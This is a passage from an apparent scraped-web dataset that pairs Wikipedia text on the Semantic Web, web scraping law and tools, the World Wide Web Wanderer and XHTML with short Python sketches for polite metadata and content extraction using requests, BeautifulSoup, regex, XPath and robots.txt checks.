structure of the knowledge we have about that content. In this way, a machine can process knowledge itself, instead of text, using processes similar to human deductive reasoning and inference, thereby obtaining more meaningful results and helping computers to perform automated information gathering and research. An example of a tag that would be used in a non-semantic web page: Encoding similar information in a semantic web page might look like this: Tim Berners-Lee calls the resulting network of Linked Data the Giant Global Graph, in contrast to the HTML-based World Wide Web. Berners-Lee posits that if the past was document sharing, the future is data sharing. His answer to the question of "how" provides three points of instruction. One, a URL should point to the data. Two, anyone accessing the URL should get data back. Three, relationships in the data should point to additional URLs with data. Tags, including hierarchical categories and tags that are collaboratively added and maintained (e.g. with folksonomies) can be considered part of, of potential use to or a step towards the semantic Web vision. 15 16 17 Unique identifiers, including hierarchical categories and collaboratively added ones, analysis tools (e.g. 
scite.ai algorithms) 18 and metadata, including tags, can be used to create forms of semantic webs webs that are to a certain degree semantic. In particular, such has been used for structuring scientific research i.a. by research topics and scientific fields by the projects OpenAlex, 19 20 21 Wikidata and Scholia which are under development and provide APIs, Web-pages, feeds and graphs for various semantic queries. Tim Berners-Lee has described the Semantic Web as a component of Web 3.0. 22 People keep asking what Web 3.0 is. I think maybe when you've got an overlay of scalable vector graphics everything rippling and folding and looking misty on Web 2.0 and access to a semantic Web integrated across a huge space of data, you'll have access to an unbelievable data resource … "Semantic Web" is sometimes used as a synonym for "Web 3.0", 23 though the definition of each term varies. Some of the challenges for the Semantic Web include vastness, vagueness, uncertainty, inconsistency, and deceit. Automated reasoning systems will have to deal with all of these issues in order to deliver on the promise of the Semantic Web. This list of challenges is illustrative rather than exhaustive, and it focuses on the challenges to the "unifying logic" and "proof" layers of the Semantic Web. The World Wide Web Consortium (W3C) Incubator Group for Uncertainty Reasoning for the World Wide Web 24 (URW3 XG) final report lumps these problems together under the single heading of "uncertainty". 25 Many of the techniques mentioned here will require extensions to the Web Ontology Language (OWL) for example to annotate conditional probabilities. This is an area of active research. 26 Standardization for Semantic Web in the context of Web 3.0 is under the care of W3C. 27 The term "Semantic Web" is often used more specifically to refer to the formats and technologies that enable it. 5 The collection, structuring and recovery of linked data are enabled by technologies that provide a formal description of concepts, terms, and relationships within a given knowledge domain. These technologies are specified as W3C standards and include: The Semantic Web Stack illustrates the architecture of the Semantic Web. The functions and relationships of the components can be summarized as follows: 28 Well-established standards: Not yet fully realized: The intent is to enhance the usability and usefulness of the Web and its interconnected resources by creating semantic web services, such as: Such services could be useful to public search engines, or could be used for knowledge management within an organization. Business applications include: In a corporation, there is a closed group of users and the management is able to enforce company guidelines like the adoption of specific ontologies and use of semantic annotation. Compared to the public Semantic Web there are lesser requirements on scalability and the information circulating within a company can be more trusted in general; privacy is less of an issue outside of handling of customer data. Critics question the basic feasibility of a complete or even partial fulfillment of the Semantic Web, pointing out both difficulties in setting it up and a lack of general-purpose usefulness that prevents the required effort from being invested. 
In a 2003 paper, Marshall and Shipman point out the cognitive overhead inherent in formalizing knowledge, compared to the authoring of traditional web hypertext: 43 While learning the basics of HTML is relatively straightforward, learning a knowledge representation language or tool requires the author to learn about the representation's methods of abstraction and their effect on reasoning. For example, understanding the class-instance relationship, or the superclass-subclass relationship, is more than understanding that one concept is a "type of" another concept. ... These abstractions are taught to computer scientists generally and knowledge engineers specifically but do not match the similar natural language meaning of being a "type of" something. Effective use of such a formal representation requires the author to become a skilled knowledge engineer in addition to any other skills required by the domain. ... Once one has learned a formal representation language, it is still often much more effort to express ideas in that representation than in a less formal representation ... . Indeed, this is a form of programming based on the declaration of semantic data and requires an understanding of how reasoning algorithms will interpret the authored structures. According to Marshall and Shipman, the tacit and changing nature of much knowledge adds to the knowledge engineering problem, and limits the Semantic Web's applicability to specific domains. A further issue that they point out are domain- or organization-specific ways to express knowledge, which must be solved through community agreement rather than only technical means. 43 As it turns out, specialized communities and organizations for intra-company projects have tended to adopt semantic web technologies greater than peripheral and less-specialized communities. 44 The practical constraints toward adoption have appeared less challenging where domain and scope is more limited than that of the general public and the World-Wide Web. 44 Finally, Marshall and Shipman see pragmatic problems in the idea of (Knowledge Navigator-style) intelligent agents working in the largely manually curated Semantic Web: 43 In situations in which user needs are known and distributed information resources are well described, this approach can be highly effective; in situations that are not foreseen and that bring together an unanticipated array of information resources, the Google approach is more robust. Furthermore, the Semantic Web relies on inference chains that are more brittle; a missing element of the chain results in a failure to perform the desired action, while the human can supply missing pieces in a more Google-like approach. ... cost-benefit tradeoffs can work in favor of specially-created Semantic Web metadata directed at weaving together sensible well-structured domain-specific information resources; close attention to user customer needs will drive these federations if they are to be successful. Cory Doctorow's critique ("metacrap") 45 is from the perspective of human behavior and personal preferences. For example, people may include spurious metadata into Web pages in an attempt to mislead Semantic Web engines that naively assume the metadata's veracity. This phenomenon was well known with metatags that fooled the Altavista ranking algorithm into elevating the ranking of certain Web pages: the Google indexing engine specifically looks for such attempts at manipulation. 
Peter G rdenfors and Timo Honkela point out that logic-based semantic web technologies cover only a fraction of the relevant phenomena related to semantics. 46 47 Enthusiasm about the semantic web could be tempered by concerns regarding censorship and privacy. For instance, text-analyzing techniques can now be easily bypassed by using other words, metaphors for instance, or by using images in place of words. An advanced implementation of the semantic web would make it much easier for governments to control the viewing and creation of online information, as this information would be much easier for an automated content-blocking machine to understand. In addition, the issue has also been raised that, with the use of FOAF files and geolocation meta-data, there would be very little anonymity associated with the authorship of articles on things such as a personal blog. Some of these concerns were addressed in the "Policy Aware Web" project 48 and is an active research and development topic. Another criticism of the semantic web is that it would be much more time-consuming to create and publish content because there would need to be two formats for one piece of data: one for human viewing and one for machines. However, many web applications in development are addressing this issue by creating a machine-readable format upon the publishing of data or the request of a machine for such data. The development of microformats has been one reaction to this kind of criticism. Another argument in defense of the feasibility of semantic web is the likely falling price of human intelligence tasks in digital labor markets, such as Amazon's Mechanical Turk. citation needed Specifications such as eRDF and RDFa allow arbitrary RDF data to be embedded in HTML pages. The GRDDL (Gleaning Resource Descriptions from Dialects of Language) mechanism allows existing material (including microformats) to be automatically interpreted as RDF, so publishers only need to use a single format, such as HTML. The first research group explicitly focusing on the Corporate Semantic Web was the ACACIA team at INRIA-Sophia-Antipolis, founded in 2002. Results of their work include the RDF(S) based Corese 49 search engine, and the application of semantic web technology in the realm of distributed artificial intelligence for knowledge management (e.g. ontologies and multi-agent systems for corporate semantic Web) 50 and E-learning. 51 Since 2008, the Corporate Semantic Web research group, located at the Free University of Berlin, focuses on building blocks: Corporate Semantic Search, Corporate Semantic Collaboration, and Corporate Ontology Engineering. 52 Ontology engineering research includes the question of how to involve non-expert users in creating ontologies and semantically annotated content 53 and for extracting explicit knowledge from the interaction of users within enterprises. Tim O'Reilly, who coined the term Web 2.0, proposed a long-term vision of the Semantic Web as a web of data, where sophisticated applications are navigating and manipulating it. 54 The data web transforms the World Wide Web from a distributed file system into a distributed database. 55 |
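The scraped Semantic Web article above walks through embedding machine-readable metadata in HTML: meta tags carrying fields such as "keywords", "description" and "author", and RDFa/schema.org annotations that describe things rather than documents. As a rough illustration of how such markup can be harvested with the libraries already used in this notebook (requests, BeautifulSoup, html5lib), the sketch below collects a page's meta tags and any embedded schema.org JSON-LD blocks. The URL in the usage comment is a placeholder and the extract_metadata helper is our own, not part of any library; pages that use RDFa or Microdata instead of JSON-LD would need a dedicated parser.

import json
import requests
from bs4 import BeautifulSoup

def extract_metadata(url):
    """Collect <meta> tags and any schema.org JSON-LD blocks from a page.

    A minimal sketch, assuming the page exposes its metadata this way;
    many pages omit these tags or use RDFa/Microdata instead.
    """
    soup = BeautifulSoup(requests.get(url, timeout=10).text, "html5lib")

    # Document-level metadata such as keywords, description, author
    meta = {
        tag.get("name"): tag.get("content")
        for tag in soup.find_all("meta")
        if tag.get("name") and tag.get("content")
    }

    # schema.org descriptions are often embedded as JSON-LD script blocks
    json_ld = []
    for script in soup.find_all("script", type="application/ld+json"):
        try:
            json_ld.append(json.loads(script.string or ""))
        except json.JSONDecodeError:
            pass  # skip malformed blocks

    return meta, json_ld

# Example (hypothetical URL):
# meta, graphs = extract_metadata("https://example.com/")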
24 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/World_Wide_Web_Wanderer | The World Wide Web Wanderer, also simply called The Wanderer, was a Perl-based web crawler that was first deployed in June 1993 to measure the size of the World Wide Web. The Wanderer was developed at the Massachusetts Institute of Technology by Matthew Gray, who in 1993 also created www.mit.edu, one of the first 100 web servers in history. 1 The crawler was used to generate an index called the Wandex later in 1993. The Wanderer charted the growth of the web until late 1995. The Wanderer was probably the first web robot, and, with its index, clearly had the potential to become a general-purpose WWW search engine, although its author, Matthew Gray, does not make this claim. 2 Elsewhere, it is stated that the purpose of the Wanderer was not to be a web search engine. 3 |
25 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&printable=yes | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping would be a violation of contract law. It would also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
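The Web scraping article scraped above notes that the simplest programmatic technique is grep-style pattern matching over pages fetched with plain HTTP requests. Below is a minimal sketch of that idea using requests and the re module already imported in this notebook; the grep_page helper is ours, the URL and e-mail pattern in the usage comment are illustrative assumptions, and regex-only extraction is brittle compared with parsing the DOM.

import re
import requests

def grep_page(url, pattern):
    """Fetch a page over HTTP and return all regex matches in its raw HTML.

    Sketch of the 'UNIX grep / regular expression' technique described above;
    it ignores HTML structure entirely, so it is quick but brittle.
    """
    html = requests.get(url, timeout=10).text
    return re.findall(pattern, html)

# Illustrative use: harvest e-mail-like strings from a hypothetical page.
# emails = grep_page("https://example.com/contact",
#                    r"[\w.+-]+@[\w-]+\.[\w.-]+")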
26 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#HTTP_programming | (Scraped text omitted: the #HTTP_programming anchor resolves to the same Web scraping article, so this row's content is a verbatim duplicate of row 25.) |
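The same article also describes parsing a fetched page into a DOM tree and querying it with an expression language such as XPath. The sketch below uses lxml, which is an assumed extra dependency (it is not installed at the top of this notebook); the xpath_scrape helper is ours, and the URL and XPath expression in the usage comment are placeholders to be adapted to the target page.

import requests
from lxml import html  # assumed extra dependency: pip install lxml

def xpath_scrape(url, expression):
    """Parse a fetched page into a DOM tree and evaluate an XPath expression.

    Sketch of the DOM-parsing approach described in the scraped article;
    the expression must be tailored to the structure of the target page.
    """
    tree = html.fromstring(requests.get(url, timeout=10).content)
    return tree.xpath(expression)

# Example (hypothetical): all link targets on a page
# hrefs = xpath_scrape("https://example.com/", "//a/@href")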
27 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit&section=1 | (Scraped text omitted: the edit URL returned Wikipedia's edit-permission and IP-range-block notice rather than article content.) |
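Row 27 is a reminder that a scraper can receive an access-control or block page instead of article content, and the scraped material above notes that administrators use various measures to stop or slow bots. The sketch below shows two defensive habits: consulting robots.txt through the standard library's urllib.robotparser before fetching, and checking the HTTP status code so error or block pages are skipped rather than stored. The polite_fetch helper, the default user agent and the example URL are assumptions; a production scraper would also rate-limit requests and honor Crawl-delay, which this sketch omits.

import requests
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser

def polite_fetch(url, user_agent="*"):
    """Fetch a page only if robots.txt permits it and the server returns 200.

    A minimal sketch of polite scraping; None means the page was skipped.
    """
    # Consult the site's robots.txt before requesting the page
    rp = RobotFileParser(urljoin(url, "/robots.txt"))
    rp.read()
    if not rp.can_fetch(user_agent, url):
        return None  # disallowed by robots.txt

    response = requests.get(url, timeout=10)
    if response.status_code != 200:
        return None  # blocked, missing, or erroring page: do not store it
    return response.text

# Example (hypothetical URL):
# text = polite_fetch("https://example.com/some/page")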
28 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/XHTML | Extensible HyperText Markup Language (XHTML) is part of the family of XML markup languages which mirrors or extends versions of the widely used HyperText Markup Language (HTML), the language in which Web pages are formulated. 1 While HTML, prior to HTML5, was defined as an application of Standard Generalized Markup Language (SGML), a flexible markup language framework, XHTML is an application of XML, a more restrictive subset of SGML. XHTML documents are well-formed and may therefore be parsed using standard XML parsers, unlike HTML, which requires a lenient HTML-specific parser. 2 XHTML 1.0 became a World Wide Web Consortium (W3C) recommendation on 26 January 2000. XHTML 1.1 became a W3C recommendation on 31 May 2001. XHTML is now referred to as "the XML syntax for HTML" 3 4 and being developed as an XML adaptation of the HTML living standard. 5 6 XHTML 1.0 was "a reformulation of the three HTML 4 document types as applications of XML 1.0". 7 The World Wide Web Consortium (W3C) also simultaneously maintained the HTML 4.01 Recommendation. In the XHTML 1.0 Recommendation document, as published and revised in August 2002, the W3C commented that "The XHTML family is the next step in the evolution of the Internet. By migrating to XHTML today, content developers can enter the XML world with all of its attendant benefits, while still remaining confident in their content's backward and future compatibility. 7 However, in 2005, the Web Hypertext Application Technology Working Group (WHATWG) formed, independently of the W3C, to work on advancing ordinary HTML not based on XHTML. The WHATWG eventually began working on a standard that supported both XML and non-XML serializations, HTML5, in parallel to W3C standards such as XHTML 2.0. In 2007, the W3C's HTML working group voted to officially recognize HTML5 and work on it as the next-generation HTML standard. 8 In 2009, the W3C allowed the XHTML 2.0 Working Group's charter to expire, acknowledging that HTML5 would be the sole next-generation HTML standard, including both XML and non-XML serializations. 9 Of the two serializations, the W3C suggests that most authors use the HTML syntax, rather than the XHTML syntax. 10 The W3C recommendations of both XHTML 1.0 and XHTML 1.1 were retired on 27 March 2018, 11 12 along with HTML 4.0, 13 HTML 4.01, 14 and HTML5. 15 XHTML was developed to make HTML more extensible and increase interoperability with other data formats. 16 In addition, browsers were forgiving of errors in HTML, and most websites were displayed despite technical errors in the markup; XHTML introduced stricter error handling. 17 HTML 4 was ostensibly an application of Standard Generalized Markup Language (SGML); however the specification for SGML was complex, and neither web browsers nor the HTML 4 Recommendation were fully conformant to it. 18 The XML standard, approved in 1998, provided a simpler data format closer in simplicity to HTML 4. 19 By shifting to an XML format, it was hoped HTML would become compatible with common XML tools; 20 servers and proxies would be able to transform content, as necessary, for constrained devices such as mobile phones. 21 By using namespaces, XHTML documents could provide extensibility by including fragments from other XML-based languages such as Scalable Vector Graphics and MathML. 
22 Finally, the renewed work would provide an opportunity to divide HTML into reusable components (XHTML Modularization) and clean up untidy parts of the language. 23 There are various differences between XHTML and HTML. The Document Object Model (DOM) is a tree structure that represents the page internally in applications, and XHTML and HTML are two different ways of representing that in markup. Both are less expressive than the DOM for example, may be placed in comments in the DOM, but cannot be represented in a comment in either XHTML or HTML and generally, XHTML's XML syntax is more expressive than HTML (for example, arbitrary namespaces are not allowed in HTML). XHTML uses an XML syntax, while HTML uses a pseudo-SGML syntax (officially SGML for HTML 4 and under, but never in practice, and standardized away from SGML in HTML5). Because the expressible contents of the DOM in syntax are slightly different, there are some changes in actual behavior between the two models. Syntax differences, however, can be overcome by implementing an alternate translational framework within the markup. First, there are some differences in syntax: 24 In addition to the syntactical differences, there are some behavioral differences, mostly arising from the underlying differences in serialization. For example: The similarities between HTML 4.01 and XHTML 1.0 led many websites and content management systems to adopt the initial W3C XHTML 1.0 Recommendation. To aid authors in the transition, the W3C provided guidance on how to publish XHTML 1.0 documents in an HTML-compatible manner, and serve them to browsers that were not designed for XHTML. 28 29 Such "HTML-compatible" content is sent using the HTML media type (text html) rather than the official Internet media type for XHTML (application xhtml xml). When measuring the adoption of XHTML to that of regular HTML, therefore, it is important to distinguish whether it is media type usage or actual document contents that are being compared. 30 31 Most web browsers have mature support 32 for all of the possible XHTML media types. 33 The notable exception is Internet Explorer versions 8 and earlier by Microsoft; rather than rendering application xhtml xml content, a dialog box invites the user to save the content to disk instead. Both Internet Explorer 7 (released in 2006) and Internet Explorer 8 (released in March 2009) exhibit this behavior. 34 Microsoft developer Chris Wilson explained in 2005 that IE7's priorities were improved browser security and CSS support, and that proper XHTML support would be difficult to graft onto IE's compatibility-oriented HTML parser; 35 however, Microsoft added support for true XHTML in IE9. 36 As long as support is not widespread, most web developers avoid using XHTML that is not HTML-compatible, 37 so advantages of XML such as namespaces, faster parsing, and smaller-footprint browsers do not benefit the user. 38 39 40 In the early 2000s, some Web developers began to question why Web authors ever made the leap into authoring in XHTML. 41 42 43 Others countered that the problems ascribed to the use of XHTML could mostly be attributed to two main sources: the production of invalid XHTML documents by some Web authors and the lack of support for XHTML built into Internet Explorer 6. 44 45 They went on to describe the benefits of XML-based Web documents (i.e. XHTML) regarding searching, indexing, and parsing as well as future-proofing the Web itself. 
In October 2006, HTML inventor and W3C chair Tim Berners-Lee, introducing a major W3C effort to develop a new HTML specification, posted in his blog that t he attempt to get the world to switch to XML ... all at once didn't work. The large HTML-generating public did not move ... Some large communities did shift and are enjoying the fruits of well-formed systems ... The plan is to charter a completely new HTML group. 46 The current HTML5 working draft says "special attention has been given to defining clear conformance criteria for user agents in an effort to improve interoperability ... while at the same time updating the HTML specifications to address issues raised in the past few years. Ian Hickson, editor of the HTML5 specification criticizing the improper use of XHTML in 2002, 41 is a member of the group developing this specification and is listed as one of the co-editors of the current working draft. 47 Simon Pieters researched the XML-compliance of mobile browsers 48 and concluded "the claim that XHTML would be needed for mobile devices is simply a myth". December 1998 saw the publication of a W3C Working Draft entitled Reformulating HTML in XML. This introduced Voyager, the codename for a new markup language based on HTML 4, but adhering to the stricter syntax rules of XML. By February 1999 the name of the specification had changed to XHTML 1.0: The Extensible HyperText Markup Language, and in January 2000 it was officially adopted as a W3C Recommendation. 49 There are three formal Document Type Definitions (DTD) for XHTML 1.0, corresponding to the three different versions of HTML 4.01: The second edition of XHTML 1.0 became a W3C Recommendation in August 2002. 50 Modularization provides an abstract collection of components through which XHTML can be subsetted and extended. The feature is intended to help XHTML extend its reach onto emerging platforms, such as mobile devices and Web-enabled televisions. The initial draft of Modularization of XHTML became available in April 1999, and reached Recommendation status in April 2001. 51 The first modular XHTML variants were XHTML 1.1 and XHTML Basic 1.0. In October 2008 Modularization of XHTML was superseded by XHTML Modularization 1.1, which adds an XML Schema implementation. It was superseded by a second edition in July 2010. 52 XHTML 1.1 evolved out of the work surrounding the initial Modularization of XHTML specification. The W3C released the first draft in September 1999; the Recommendation status was reached in May 2001. 53 The modules combined within XHTML 1.1 effectively recreate XHTML 1.0 Strict, with the addition of ruby annotation elements (ruby, rbc, rtc, rb, rt and rp) to better support East-Asian languages. Other changes include the removal of the name attribute from the a and map elements, and (in the first edition of the language) the removal of the lang attribute in favor of xml:lang. Although XHTML 1.1 is largely compatible with XHTML 1.0 and HTML 4, in August 2002 the Working Group issued a formal Note advising that it should not be transmitted with the HTML media type. 54 With limited browser support for the alternate application xhtml xml media type, XHTML 1.1 proved unable to gain widespread use. In January 2009 a second edition of the document (XHTML Media Types Second Edition) was issued, relaxing this restriction and allowing XHTML 1.1 to be served as text html. 
